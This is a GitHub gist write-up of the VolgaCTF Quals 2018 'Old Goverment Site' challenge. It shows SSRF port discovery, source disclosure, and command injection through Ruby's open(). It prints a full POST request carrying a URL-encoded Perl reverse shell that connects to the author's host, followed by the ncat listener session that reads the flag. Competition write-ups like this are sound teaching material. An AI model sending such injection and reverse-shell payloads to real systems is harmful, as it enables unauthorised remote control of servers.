Skip to content

Instantly share code, notes, and snippets.

@pich4ya

pich4ya/VolgaCTF Quals 2018 - Old Goverment Site Writeup.txt

Created March 25, 2018 15:17
Show Gist options
  • Save pich4ya/ca332e578b40bba359c98e1898daddcc to your computer and use it in GitHub Desktop.
Save pich4ya/ca332e578b40bba359c98e1898daddcc to your computer and use it in GitHub Desktop.
Download ZIP
VolgaCTF Quals 2018 - Old Goverment Site Writeup
Raw
VolgaCTF Quals 2018 - Old Goverment Site Writeup.txt
Old Goverment Site
It's an old government web-site. Please, don't touch it. It works properly.
http://old-government-site.quals.2018.volgactf.ru:8080/
http://old-government-site.quals.2018.volgactf.ru:8080/page?id=2
http://old-government-site.quals.2018.volgactf.ru:8080/page?id=18
Form with 2 fields > Site, Company description.
Site parameter was vulnerable to SSRF:
Valid HTTP req/res =>
<ul class="form-style-1">
validated
Invalid HTTP req/res =>
<ul class="form-style-1">
error
POST /page?id=18 HTTP/1.1
Host: old-government-site.quals.2018.volgactf.ru:8080
[..]
site=http://127.0.0.1:8080&description=bbb
site=http://127.0.0.1:8888&description=bbb
site=http://127.0.0.1:8889&description=bbb
<ul class="form-style-1">
validated
http://old-government-site.quals.2018.volgactf.ru:8888
This port can be identified using nmap but I didn't do it as the most of CTF games do not allow it.
Directory listing was found at http://old-government-site.quals.2018.volgactf.ru:8888/
app.rb
pages/
public/
views/
$ wget -r -R "index.html*" http://old-government-site.quals.2018.volgactf.ru:8888/
$ cat old-government-site.quals.2018.volgactf.ru:8888/views/page18.erb
<%
unless params[:site].nil?
result = siteValidator(params[:site])
end
%>
[...]
$ cat old-government-site.quals.2018.volgactf.ru:8888/app.rb
[...]
def siteValidator(site)
begin
r = open(site, :allow_redirections => :all) <-- RCE
"validated"
rescue Exception => e
"error"
end
end
It is quite obivous that we have command injection vulnerability with open() function here.
e.g.
# ruby -e 'puts open("|id").read()'
uid=0(root) gid=0(root) groups=0(root)
POST /page?id=18 HTTP/1.1
Host: old-government-site.quals.2018.volgactf.ru:8080
Content-Length: 274
Cache-Control: max-age=0
Origin: http://old-government-site.quals.2018.volgactf.ru:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://old-government-site.quals.2018.volgactf.ru:8080/page?id=18
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,th;q=0.8
Connection: close
site=|perl+-e+'use+Socket%3b$i%3d"longcatnaja"%3b$p%3d1234%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'&description=bbb
; on my server
$ ncat -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: C7F1 2122 824C 97E5 0A06 6C79 ADB2 FBEE C059 3D4C
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 188.246.233.28.
Ncat: Connection from 188.246.233.28:49782.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
$ ls -lha /
total 88K
drwxr-xr-x 22 root root 4.0K Mar 23 19:08 .
drwxr-xr-x 22 root root 4.0K Mar 23 19:08 ..
drwxr-xr-x 2 root root 4.0K Mar 23 19:05 bin
drwxr-xr-x 3 root root 4.0K Mar 23 19:05 boot
drwxr-xr-x 17 root root 3.6K Mar 24 18:39 dev
drwxr-xr-x 95 root root 4.0K Mar 24 18:39 etc
-rw-r--r-- 1 root root 41 Mar 23 19:37 flag
[...]
$ cat /flag
VolgaCTF{dedicated_to_all_goverment_site}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment